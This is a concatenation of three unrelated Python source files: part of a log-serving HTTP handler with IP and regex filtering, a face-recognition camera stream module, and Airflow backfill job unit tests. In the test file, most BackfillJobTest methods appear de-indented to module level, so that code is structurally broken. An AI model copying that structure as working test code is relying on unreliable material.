                    date = datetime.datetime.strptime(dates, "%Y-%m-%d").strftime("%Y-%m-%d")
                    event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date)
                    if os.path.exists(event_log_path):
                        range_handle = open(event_log_path, "rb")
                        log_exists = True
                except ValueError:
                    print "[!] invalid date format in request"
                    log_exists = False
            else:
                # Date-interval request: concatenate each day's log in memory.
                logs_data = ""
                date_interval = dates.split("_", 1)
                try:
                    start_date = datetime.datetime.strptime(date_interval[0], "%Y-%m-%d").date()
                    end_date = datetime.datetime.strptime(date_interval[1], "%Y-%m-%d").date()
                    for i in xrange(int((end_date - start_date).days) + 1):
                        date = start_date + datetime.timedelta(i)
                        event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date.strftime("%Y-%m-%d"))
                        if os.path.exists(event_log_path):
                            log_handle = open(event_log_path, "rb")
                            logs_data += log_handle.read()
                            log_handle.close()
                    range_handle = io.BytesIO(logs_data)
                    log_exists = True
                except ValueError:
                    print "[!] invalid date format in request"
                    log_exists = False
            if log_exists:
                range_handle.seek(0, 2)
                total = range_handle.tell()
                range_handle.seek(0)
                if self.headers.get(HTTP_HEADER.RANGE):
                    match = re.search(r"bytes=(\d+)-(\d+)", self.headers[HTTP_HEADER.RANGE])
                    if match:
                        start, end = int(match.group(1)), int(match.group(2))
                        max_size = end - start + 1
                        end = min(total - 1, end)
                        size = end - start + 1
                        if start == 0 or not session.range_handle:
                            session.range_handle = range_handle
                        if session.netfilters is None:
                            # Unfiltered user: plain byte-range response.
                            session.range_handle.seek(start)
                            self.send_response(httplib.PARTIAL_CONTENT)
                            self.send_header(HTTP_HEADER.CONNECTION, "close")
                            self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
                            self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, total))
                            content = session.range_handle.read(size)
                        else:
                            # Filtered user: stream lines, keeping only those matching
                            # the session's address/netmask/regex filters.
                            self.send_response(httplib.OK)
                            self.send_header(HTTP_HEADER.CONNECTION, "close")
                            self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
                            buffer, addresses, netmasks, regex = cStringIO.StringIO(), set(), [], ""
                            for netfilter in session.netfilters:
                                if not netfilter:
                                    continue
                                if '/' in netfilter:
                                    netmasks.append(netfilter)
                                elif re.search(r"\A[\d.]+\Z", netfilter):
                                    addresses.add(netfilter)
                                elif '\.' in netfilter:
                                    regex = r"\b(%s)\b" % netfilter
                                else:
                                    print "[!] invalid network filter '%s'" % netfilter
                                    return
                            for line in session.range_handle:
                                display = False
                                ip = None
                                if regex:
                                    match = re.search(regex, line)
                                    if match:
                                        ip = match.group(1)
                                        display = True
                                if not display and (addresses or netmasks):
                                    for match in re.finditer(r"\b(\d+\.\d+\.\d+\.\d+)\b", line):
                                        if not display:
                                            ip = match.group(1)
                                        else:
                                            break
                                        if ip in addresses:
                                            display = True
                                            break
                                        elif netmasks:
                                            for _ in netmasks:
                                                prefix, mask = _.split('/')
                                                if addr_to_int(ip) & make_mask(int(mask)) == addr_to_int(prefix):
                                                    # Cache matched addresses for cheaper later lookups.
                                                    addresses.add(ip)
                                                    display = True
                                                    break
                                if display:
                                    if ",%s" % ip in line or "%s," % ip in line:
                                        # Collapse multi-IP lists down to the matched IP only.
                                        line = re.sub(r" ([\d.,]+,)?%s(,[\d.,]+)? " % re.escape(ip), " %s " % ip, line)
                                    buffer.write(line)
                                    if buffer.tell() >= max_size:
                                        break
                            content = buffer.getvalue()
                            end = start + len(content) - 1
                            self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, end + 1 + max_size * (len(content) >= max_size)))
                        if len(content) < max_size:
                            session.range_handle.close()
                            session.range_handle = None
                if size == -1:
                    # No (usable) Range header: stream the whole log.
                    self.send_response(httplib.OK)
                    self.send_header(HTTP_HEADER.CONNECTION, "close")
                    self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
                    self.end_headers()
                    with range_handle as f:
                        while True:
                            data = f.read(io.DEFAULT_BUFFER_SIZE)
                            if not data:
                                break
                            else:
                                self.wfile.write(data)
            else:
                self.send_response(httplib.OK)  # instead of httplib.NO_CONTENT (compatibility reasons)
                self.send_header(HTTP_HEADER.CONNECTION, "close")
                if self.headers.get(HTTP_HEADER.RANGE):
                    self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes 0-0/0")
            return content
        def _counts(self, params):
            """Handle /counts: return a JSON map of day-timestamp -> (estimated)
            event count for logs between the optional 'from' and 'to' dates.
            """
            counts = {}
            session = self.get_session()
            if session is None:
                self.send_response(httplib.UNAUTHORIZED)
                self.send_header(HTTP_HEADER.CONNECTION, "close")
                return None
            self.send_response(httplib.OK)
            self.send_header(HTTP_HEADER.CONNECTION, "close")
            self.send_header(HTTP_HEADER.CONTENT_TYPE, "application/json")
            match = re.search(r"\d+\-\d+\-\d+", params.get("from", ""))
            if match:
                min_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
            else:
                min_ = datetime.datetime.fromtimestamp(0)
            match = re.search(r"\d+\-\d+\-\d+", params.get("to", ""))
            if match:
                max_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
            else:
                max_ = datetime.datetime.now()
            # Widen the bounds to whole days.
            min_ = min_.replace(hour=0, minute=0, second=0, microsecond=0)
            max_ = max_.replace(hour=23, minute=59, second=59, microsecond=999999)
            for filepath in sorted(glob.glob(os.path.join(config.LOG_DIR, "*.log"))):
                filename = os.path.basename(filepath)
                if not re.search(r"\A\d{4}-\d{2}-\d{2}\.log\Z", filename):
                    continue
                try:
                    current = datetime.datetime.strptime(os.path.splitext(filename)[0], DATE_FORMAT)
                except:
                    if config.SHOW_DEBUG:
                        traceback.print_exc()
                else:
                    if min_ <= current <= max_:
                        timestamp = int(time.mktime(current.timetuple()))
                        size = os.path.getsize(filepath)
                        with open(filepath, "rb") as f:
                            content = f.read(io.DEFAULT_BUFFER_SIZE)
                        # For big files, extrapolate the line count from the first
                        # buffer and round to the nearest hundred.
                        if size >= io.DEFAULT_BUFFER_SIZE:
                            total = 1.0 * content.count('\n') * size / io.DEFAULT_BUFFER_SIZE
                            counts[timestamp] = int(round(total / 100) * 100)
                        else:
                            counts[timestamp] = content.count('\n')
            return json.dumps(counts)
    class SSLReqHandler(ReqHandler):
        """ReqHandler variant wrapping the raw SSL connection in file objects."""
        def setup(self):
            self.connection = self.request
            self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
            self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
# --- entry point: build and start the reporting HTTP(S) server ---
try:
    # Non-numeric port falls back to 0 (OS-assigned ephemeral port).
    if pem:
        # A PEM certificate/key was supplied -> serve over TLS.
        server = SSLThreadingServer((address or '', int(port) if str(port or "").isdigit() else 0), pem, SSLReqHandler)
    else:
        server = ThreadingServer((address or '', int(port) if str(port or "").isdigit() else 0), ReqHandler)
except Exception as ex:
    # Map common bind/resolve errors to friendly, actionable messages;
    # anything unexpected is re-raised untouched.
    if "Address already in use" in str(ex):
        exit("[!] another instance already running")
    elif "Name or service not known" in str(ex):
        exit("[!] invalid configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
    elif "Cannot assign requested address" in str(ex):
        exit("[!] can't use configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
    else:
        raise
print "[i] starting HTTP%s server at 'http%s://%s:%d/'" % ('S' if pem else "", 's' if pem else "", server.server_address[0], server.server_address[1])
print "[o] running..."
if join:
    # Blocking mode: serve on the calling thread.
    server.serve_forever()
else:
    # Background mode: daemon thread so it never blocks process exit.
    thread = threading.Thread(target=server.serve_forever)
    thread.daemon = True
    thread.start()
|
camera_opencv.py | import os
import cv2
from base_camera import BaseCamera
import face_recognition
import numpy as np
import glob
import time
import threading
from os.path import basename, splitext
from base64 import b64decode, b64encode
class Camera(BaseCamera):
    """Camera feed that labels faces recognized from ./images/*.jpg.

    The gallery of known faces lives in the class-level parallel lists
    ``known_face_encodings`` / ``known_face_names`` (encoding i belongs to
    the person named names[i]; the name is the image file's stem).  A daemon
    thread started from __init__ refreshes the gallery every 10 seconds.
    """

    # Passed verbatim to cv2.VideoCapture; overridable through the
    # OPENCV_CAMERA_SOURCE environment variable.
    video_source = "0"
    known_face_encodings = []
    known_face_names = []

    def __init__(self):
        if os.environ.get('OPENCV_CAMERA_SOURCE'):
            Camera.set_video_source(os.environ['OPENCV_CAMERA_SOURCE'])
        # Background refresh of the known-faces gallery.
        refresher = threading.Thread(target=Camera.reload_images)
        refresher.daemon = True  # FIX: setDaemon() is deprecated
        refresher.start()
        super(Camera, self).__init__()

    @staticmethod
    def set_video_source(source):
        """Set the capture source (device index string, file path or URL)."""
        Camera.video_source = source

    @staticmethod
    def get_image_encode_string(filename):
        """Return the raw bytes of *filename*, base64-encoded."""
        with open(filename, "rb") as image:
            return b64encode(image.read())

    @staticmethod
    def _load_known_faces():
        """Scan ./images/*.jpg and return (encodings, names).

        FIX: images in which no face is detected are skipped; the original
        code indexed face_encodings(image)[0] blindly and raised IndexError
        on them.
        """
        encodings = []
        names = []
        for filefullname in glob.glob("./images/*.jpg", recursive=False):
            image = face_recognition.load_image_file(filefullname)
            found = face_recognition.face_encodings(image)
            if not found:
                continue  # no face detected in this picture
            encodings.append(found[0])
            names.append(splitext(basename(filefullname))[0])
        return encodings, names

    @staticmethod
    def reload_images():
        """Daemon loop: rebuild the known-faces gallery every 10 seconds.

        FIX: dropped the bogus ``global known_face_encodings`` declarations —
        the assignments always targeted the Camera class attributes, so the
        module globals were never used.
        """
        while True:
            # Build into fresh lists, then swap, so readers never observe a
            # half-filled gallery.
            encodings, names = Camera._load_known_faces()
            Camera.known_face_encodings = encodings
            Camera.known_face_names = names
            print(Camera.known_face_names)
            time.sleep(10)

    @staticmethod
    def frames():
        """Generator yielding JPEG-encoded frames with recognized faces boxed."""
        camera = cv2.VideoCapture(Camera.video_source)
        if not camera.isOpened():
            print('Could not start camera.')
            return
        # Synchronous initial load so the very first frames can match faces.
        encodings, names = Camera._load_known_faces()
        Camera.known_face_encodings = encodings
        Camera.known_face_names = names
        print(Camera.known_face_names)
        # Initialize some variables
        process_this_frame = True
        face_locations = []
        face_names = []
        while True:
            # Grab a single frame of video
            ret, frame = camera.read()
            if not ret:
                print("Could not read camera.")
                time.sleep(3)
                continue
            # Resize frame of video to 1/4 size for faster face recognition processing
            small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)
            # Convert the image from BGR color (which OpenCV uses) to RGB color
            # (which face_recognition uses)
            rgb_small_frame = small_frame[:, :, ::-1]
            # Only process every other frame of video to save time
            if process_this_frame:
                face_locations = face_recognition.face_locations(rgb_small_frame)
                face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)
                face_names = []
                for face_encoding in face_encodings:
                    name = "Unknown"
                    # FIX: guard the empty gallery — np.argmin raises on an
                    # empty distance array.
                    if Camera.known_face_encodings:
                        matches = face_recognition.compare_faces(
                            Camera.known_face_encodings, face_encoding)
                        # Use the known face with the smallest distance to the new face
                        face_distances = face_recognition.face_distance(
                            Camera.known_face_encodings, face_encoding)
                        best_match_index = np.argmin(face_distances)
                        if matches[best_match_index]:
                            name = Camera.known_face_names[best_match_index]
                    face_names.append(name)
            process_this_frame = not process_this_frame
            # Display the results
            for (top, right, bottom, left), name in zip(face_locations, face_names):
                # Scale back up: detection ran on the quarter-size frame
                top *= 4
                right *= 4
                bottom *= 4
                left *= 4
                # Draw a box around the face
                cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)
                # Draw a label with a name below the face
                cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)
                font = cv2.FONT_HERSHEY_DUPLEX
                cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)
            # encode as a jpeg image and return it
            yield cv2.imencode('.jpg', frame)[1].tobytes()
|
jobs.py | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import logging
import multiprocessing
import os
import shutil
import six
import threading
import time
import unittest
from tempfile import mkdtemp
import sqlalchemy
from airflow import AirflowException, settings, models
from airflow.bin import cli
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.jobs import BaseJob, BackfillJob, SchedulerJob, LocalTaskJob
from airflow.models import DAG, DagModel, DagBag, DagRun, Pool, TaskInstance as TI
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.bash_operator import BashOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from xTool.utils import timezone
from xTool.utils.dates import days_ago
from xTool.decorators.db import provide_session
from xTool.utils.state import State
from xTool.utils.timeout import timeout
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag
from xTool.utils.file import list_py_file_paths
from airflow.exceptions import AirflowConfigException
from airflow import configuration as conf
from xTool.utils.net import get_hostname
from xTool.exceptions import XToolConfigException, XToolException
from mock import Mock, patch, MagicMock, PropertyMock
from tests.executors.test_executor import TestExecutor
from tests.core import TEST_DAG_FOLDER
from airflow import configuration
# Swap in the test configuration before anything touches airflow settings.
configuration.load_test_config()
# mock: stdlib unittest.mock on py3, the `mock` backport on py2, else None.
try:
    from unittest import mock
except ImportError:
    try:
        import mock
    except ImportError:
        mock = None
DEV_NULL = '/dev/null'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TRY_NUMBER = 1
# Include the words "airflow" and "dag" in the file contents,
# tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'
# Filename to be used for dags that are created in an ad-hoc manner and can be removed/
# created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
TEST_DAGS_FOLDER = os.path.join(
    os.path.dirname(os.path.realpath(__file__)), 'dags')
class BaseJobTest(unittest.TestCase):
    """Lifecycle tests for BaseJob: final state and end_date bookkeeping."""

    class TestJob(BaseJob):
        """Minimal concrete job whose _execute runs an injected callback."""

        __mapper_args__ = {
            'polymorphic_identity': 'TestJob'
        }

        def __init__(self, cb):
            self.cb = cb
            super(BaseJobTest.TestJob, self).__init__()

        def _execute(self):
            return self.cb()

    def test_state_success(self):
        """A normally-returning job ends SUCCESS with an end_date set."""
        job = self.TestJob(lambda: True)
        job.run()
        # FIX: assertEquals is a deprecated alias of assertEqual.
        self.assertEqual(job.state, State.SUCCESS)
        self.assertIsNotNone(job.end_date)

    def test_state_sysexit(self):
        """sys.exit(0) counts as a successful completion, not a failure."""
        import sys
        job = self.TestJob(lambda: sys.exit(0))
        job.run()
        self.assertEqual(job.state, State.SUCCESS)
        self.assertIsNotNone(job.end_date)

    def test_state_failed(self):
        """An exception escaping _execute marks the job FAILED and re-raises."""
        def abort():
            raise RuntimeError("fail")
        job = self.TestJob(abort)
        with self.assertRaises(RuntimeError):
            job.run()
        self.assertEqual(job.state, State.FAILED)
        self.assertIsNotNone(job.end_date)
class BackfillJobTest(unittest.TestCase):
    """Integration tests for BackfillJob against the example/test DAGs."""

    def setUp(self):
        # CLI parser for the `airflow run` / `airflow backfill` tests.
        self.parser = cli.CLIFactory.get_parser()
        self.dagbag = DagBag(include_examples=True)
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
                 "concurrent access not supported in sqlite")
def test_trigger_controller_dag(self):
    """Backfilling the controller DAG must create schedulable TIs in the target DAG."""
    dag = self.dagbag.get_dag('example_trigger_controller_dag')
    target_dag = self.dagbag.get_dag('example_trigger_target_dag')
    dag.clear()
    target_dag.clear()
    # Before the backfill the scheduler has nothing to queue in the target.
    scheduler = SchedulerJob()
    queue = Mock()
    scheduler._process_task_instances(target_dag, queue=queue)
    self.assertFalse(queue.append.called)
    job = BackfillJob(
        dag=dag,
        start_date=DEFAULT_DATE,
        end_date=DEFAULT_DATE,
        ignore_first_depends_on_past=True
    )
    job.run()
    # After it, the triggered run makes the scheduler queue target tasks.
    scheduler = SchedulerJob()
    queue = Mock()
    scheduler._process_task_instances(target_dag, queue=queue)
    self.assertTrue(queue.append.called)
    target_dag.clear()
    dag.clear()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
                 "concurrent access not supported in sqlite")
def test_backfill_multi_dates(self):
    """A two-day backfill must create one successful DagRun per day, in order."""
    dag = self.dagbag.get_dag('example_bash_operator')
    dag.clear()
    job = BackfillJob(
        dag=dag,
        start_date=DEFAULT_DATE,
        end_date=DEFAULT_DATE + datetime.timedelta(days=1),
        ignore_first_depends_on_past=True
    )
    job.run()
    session = settings.Session()
    drs = session.query(DagRun).filter(
        DagRun.dag_id == 'example_bash_operator'
    ).order_by(DagRun.execution_date).all()
    self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
    self.assertTrue(drs[0].state == State.SUCCESS)
    self.assertTrue(drs[1].execution_date ==
                    DEFAULT_DATE + datetime.timedelta(days=1))
    self.assertTrue(drs[1].state == State.SUCCESS)
    dag.clear()
    session.close()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
                 "concurrent access not supported in sqlite")
def test_backfill_examples(self):
    """
    Test backfilling example dags
    """
    # some DAGs really are just examples... but try to make them work!
    skip_dags = [
        'example_http_operator',
        'example_twitter_dag',
        'example_trigger_target_dag',
        'example_trigger_controller_dag',  # tested above
        'test_utils',  # sleeps forever
        'example_kubernetes_executor',  # requires kubernetes cluster
        'example_kubernetes_operator'  # requires kubernetes cluster
    ]
    logger = logging.getLogger('BackfillJobTest.test_backfill_examples')
    dags = [
        dag for dag in self.dagbag.dags.values()
        if 'example_dags' in dag.full_filepath and dag.dag_id not in skip_dags
    ]
    # Clear everything first so stale state can't poison a run.
    for dag in dags:
        dag.clear(
            start_date=DEFAULT_DATE,
            end_date=DEFAULT_DATE)
    # Deterministic order keeps failures reproducible.
    for i, dag in enumerate(sorted(dags, key=lambda d: d.dag_id)):
        logger.info('*** Running example DAG #{}: {}'.format(i, dag.dag_id))
        job = BackfillJob(
            dag=dag,
            start_date=DEFAULT_DATE,
            end_date=DEFAULT_DATE,
            ignore_first_depends_on_past=True)
        job.run()
def test_backfill_conf(self):
    """BackfillJob must propagate its ``conf`` dict onto the created DagRuns."""
    dag = DAG(
        dag_id='test_backfill_conf',
        start_date=DEFAULT_DATE,
        schedule_interval='@daily')
    with dag:
        DummyOperator(
            task_id='op',
            dag=dag)
    dag.clear()
    executor = TestExecutor(do_update=True)
    # FIX: named run_conf so the local no longer shadows the module-level
    # `conf` alias for airflow.configuration.
    run_conf = json.loads("""{"key": "value"}""")
    job = BackfillJob(dag=dag,
                      executor=executor,
                      start_date=DEFAULT_DATE,
                      end_date=DEFAULT_DATE + datetime.timedelta(days=2),
                      conf=run_conf)
    job.run()
    dr = DagRun.find(dag_id='test_backfill_conf')
    self.assertEqual(run_conf, dr[0].conf)
def test_backfill_rerun_failed_tasks(self):
    """With rerun_failed_tasks=True a second backfill reruns FAILED TIs."""
    dag = DAG(
        dag_id='test_backfill_rerun_failed',
        start_date=DEFAULT_DATE,
        schedule_interval='@daily')
    with dag:
        DummyOperator(
            task_id='test_backfill_rerun_failed_task-1',
            dag=dag)
    dag.clear()
    executor = TestExecutor(do_update=True)
    job = BackfillJob(dag=dag,
                      executor=executor,
                      start_date=DEFAULT_DATE,
                      end_date=DEFAULT_DATE + datetime.timedelta(days=2),
                      )
    job.run()
    ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
            execution_date=DEFAULT_DATE)
    ti.refresh_from_db()
    # Force a failure, then backfill again with rerun_failed_tasks on.
    ti.set_state(State.FAILED)
    job = BackfillJob(dag=dag,
                      executor=executor,
                      start_date=DEFAULT_DATE,
                      end_date=DEFAULT_DATE + datetime.timedelta(days=2),
                      rerun_failed_tasks=True
                      )
    job.run()
    ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
            execution_date=DEFAULT_DATE)
    ti.refresh_from_db()
    # FIX: assertEquals is a deprecated alias of assertEqual.
    self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_upstream_failed_tasks(self):
    """rerun_failed_tasks=True must also rerun UPSTREAM_FAILED TIs."""
    dag = DAG(
        dag_id='test_backfill_rerun_upstream_failed',
        start_date=DEFAULT_DATE,
        schedule_interval='@daily')
    with dag:
        t1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1',
                           dag=dag)
        t2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2',
                           dag=dag)
        t1.set_upstream(t2)
    dag.clear()
    executor = TestExecutor(do_update=True)
    job = BackfillJob(dag=dag,
                      executor=executor,
                      start_date=DEFAULT_DATE,
                      end_date=DEFAULT_DATE + datetime.timedelta(days=2),
                      )
    job.run()
    ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
            execution_date=DEFAULT_DATE)
    ti.refresh_from_db()
    # Force UPSTREAM_FAILED, then backfill again with the rerun flag on.
    ti.set_state(State.UPSTREAM_FAILED)
    job = BackfillJob(dag=dag,
                      executor=executor,
                      start_date=DEFAULT_DATE,
                      end_date=DEFAULT_DATE + datetime.timedelta(days=2),
                      rerun_failed_tasks=True
                      )
    job.run()
    ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
            execution_date=DEFAULT_DATE)
    ti.refresh_from_db()
    # FIX: assertEquals is a deprecated alias of assertEqual.
    self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks_without_flag(self):
    """Without rerun_failed_tasks, re-backfilling over a FAILED TI must raise."""
    dag = DAG(
        dag_id='test_backfill_rerun_failed',
        start_date=DEFAULT_DATE,
        schedule_interval='@daily')
    with dag:
        DummyOperator(
            task_id='test_backfill_rerun_failed_task-1',
            dag=dag)
    dag.clear()
    executor = TestExecutor(do_update=True)
    job = BackfillJob(dag=dag,
                      executor=executor,
                      start_date=DEFAULT_DATE,
                      end_date=DEFAULT_DATE + datetime.timedelta(days=2),
                      )
    job.run()
    ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
            execution_date=DEFAULT_DATE)
    ti.refresh_from_db()
    # Force a failure, then backfill again with the flag off.
    ti.set_state(State.FAILED)
    job = BackfillJob(dag=dag,
                      executor=executor,
                      start_date=DEFAULT_DATE,
                      end_date=DEFAULT_DATE + datetime.timedelta(days=2),
                      rerun_failed_tasks=False
                      )
    with self.assertRaises(AirflowException):
        job.run()
def test_backfill_ordered_concurrent_execute(self):
    """Backfill must queue tasks in waves that respect the DAG's dependencies."""
    dag = DAG(
        dag_id='test_backfill_ordered_concurrent_execute',
        start_date=DEFAULT_DATE,
        schedule_interval="@daily")
    with dag:
        op1 = DummyOperator(task_id='leave1')
        op2 = DummyOperator(task_id='leave2')
        op3 = DummyOperator(task_id='upstream_level_1')
        op4 = DummyOperator(task_id='upstream_level_2')
        op5 = DummyOperator(task_id='upstream_level_3')
        # order randomly
        op2.set_downstream(op3)
        op1.set_downstream(op3)
        op4.set_downstream(op5)
        op3.set_downstream(op4)
    dag.clear()
    executor = TestExecutor(do_update=True)
    job = BackfillJob(dag=dag,
                      executor=executor,
                      start_date=DEFAULT_DATE,
                      end_date=DEFAULT_DATE + datetime.timedelta(days=2),
                      )
    job.run()
    # test executor history keeps a list
    history = executor.history
    # check if right order. Every loop has a 'pause' (0) to change state
    # from RUNNING to SUCCESS.
    # 6,0,3,0,3,0,3,0 = 8 loops
    self.assertEqual(8, len(history))
    loop_count = 0
    while len(history) > 0:
        queued_tasks = history.pop(0)
        if loop_count == 0:
            # first loop should contain 6 tasks (3 days x 2 tasks)
            self.assertEqual(6, len(queued_tasks))
        if loop_count == 2 or loop_count == 4 or loop_count == 6:
            # 3 days x 1 task
            self.assertEqual(3, len(queued_tasks))
        loop_count += 1
def test_backfill_pooled_tasks(self):
    """
    Test that queued tasks are executed by BackfillJob

    Test for https://github.com/airbnb/airflow/pull/1225
    """
    session = settings.Session()
    # Single-slot pool so the task gets queued before it can run.
    pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
    session.add(pool)
    session.commit()
    dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
    dag.clear()
    job = BackfillJob(
        dag=dag,
        start_date=DEFAULT_DATE,
        end_date=DEFAULT_DATE)
    # run with timeout because this creates an infinite loop if not
    # caught
    with timeout(seconds=30):
        job.run()
    ti = TI(
        task=dag.get_task('test_backfill_pooled_task'),
        execution_date=DEFAULT_DATE)
    ti.refresh_from_db()
    self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_depends_on_past(self):
    """
    Test that backfill respects ignore_depends_on_past
    """
    dag = self.dagbag.get_dag('test_depends_on_past')
    dag.clear()
    run_date = DEFAULT_DATE + datetime.timedelta(days=5)
    # backfill should deadlock: the run depends on a previous day that never ran
    self.assertRaisesRegexp(
        AirflowException,
        'BackfillJob is deadlocked',
        BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)
    BackfillJob(
        dag=dag,
        start_date=run_date,
        end_date=run_date,
        ignore_first_depends_on_past=True).run()
    # ti should have succeeded
    ti = TI(dag.tasks[0], run_date)
    ti.refresh_from_db()
    # FIX: assertEquals is a deprecated alias of assertEqual.
    self.assertEqual(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
    """
    Test that run respects ignore_all_dependencies
    """
    dag_id = 'test_run_ignores_all_dependencies'
    dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
    dag.clear()
    # `airflow run -A` forces the dependent task despite unmet dependencies.
    task0_id = 'test_run_dependent_task'
    args0 = ['run',
             '-A',
             dag_id,
             task0_id,
             DEFAULT_DATE.isoformat()]
    cli.run(self.parser.parse_args(args0))
    ti_dependent0 = TI(
        task=dag.get_task(task0_id),
        execution_date=DEFAULT_DATE)
    ti_dependent0.refresh_from_db()
    # FIX: assertEquals is a deprecated alias of assertEqual (3 occurrences).
    self.assertEqual(ti_dependent0.state, State.FAILED)
    task1_id = 'test_run_dependency_task'
    args1 = ['run',
             '-A',
             dag_id,
             task1_id,
             (DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
    cli.run(self.parser.parse_args(args1))
    ti_dependency = TI(
        task=dag.get_task(task1_id),
        execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
    ti_dependency.refresh_from_db()
    self.assertEqual(ti_dependency.state, State.FAILED)
    task2_id = 'test_run_dependent_task'
    args2 = ['run',
             '-A',
             dag_id,
             task2_id,
             (DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
    cli.run(self.parser.parse_args(args2))
    ti_dependent = TI(
        task=dag.get_task(task2_id),
        execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
    ti_dependent.refresh_from_db()
    self.assertEqual(ti_dependent.state, State.SUCCESS)
def test_run_naive_taskinstance(self):
    """
    Test that we can run naive (non-localized) task instances
    """
    NAIVE_DATE = datetime.datetime(2016, 1, 1)
    dag_id = 'test_run_ignores_all_dependencies'
    dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
    dag.clear()
    task0_id = 'test_run_dependent_task'
    args0 = ['run',
             '-A',
             dag_id,
             task0_id,
             NAIVE_DATE.isoformat()]
    cli.run(self.parser.parse_args(args0))
    ti_dependent0 = TI(
        task=dag.get_task(task0_id),
        execution_date=NAIVE_DATE)
    ti_dependent0.refresh_from_db()
    # FIX: assertEquals is a deprecated alias of assertEqual.
    self.assertEqual(ti_dependent0.state, State.FAILED)
def test_cli_backfill_depends_on_past(self):
    """
    Test that CLI respects -I argument
    """
    dag_id = 'test_dagrun_states_deadlock'
    run_date = DEFAULT_DATE + datetime.timedelta(days=1)
    args = [
        'backfill',
        dag_id,
        '-l',
        '-s',
        run_date.isoformat(),
    ]
    dag = self.dagbag.get_dag(dag_id)
    dag.clear()
    # Without -I the depends_on_past chain deadlocks the backfill.
    self.assertRaisesRegexp(
        AirflowException,
        'BackfillJob is deadlocked',
        cli.backfill,
        self.parser.parse_args(args))
    # -I (--ignore_first_depends_on_past) lets the first run proceed.
    cli.backfill(self.parser.parse_args(args + ['-I']))
    ti = TI(dag.get_task('test_depends_on_past'), run_date)
    ti.refresh_from_db()
    # task ran
    self.assertEqual(ti.state, State.SUCCESS)
    dag.clear()
def test_cli_receives_delay_arg(self):
    """Verify that ``--delay_on_limit`` reaches the parsed CLI namespace."""
    cli_args = ['backfill', 'example_bash_operator',
                '-s', DEFAULT_DATE.isoformat(),
                '--delay_on_limit', '0.5']
    namespace = self.parser.parse_args(cli_args)
    self.assertEqual(0.5, namespace.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
    """Build a small hourly DAG (4 dummy tasks) with the given max_active_runs."""
    dag = DAG(
        dag_id=dag_id,
        start_date=DEFAULT_DATE,
        schedule_interval="@hourly",
        max_active_runs=max_active_runs
    )
    with dag:
        op1 = DummyOperator(task_id='leave1')
        op2 = DummyOperator(task_id='leave2')
        op3 = DummyOperator(task_id='upstream_level_1')
        op4 = DummyOperator(task_id='upstream_level_2')
        # op3 has two upstream branches.
        op1 >> op2 >> op3
        op4 >> op3
    dag.clear()
    return dag
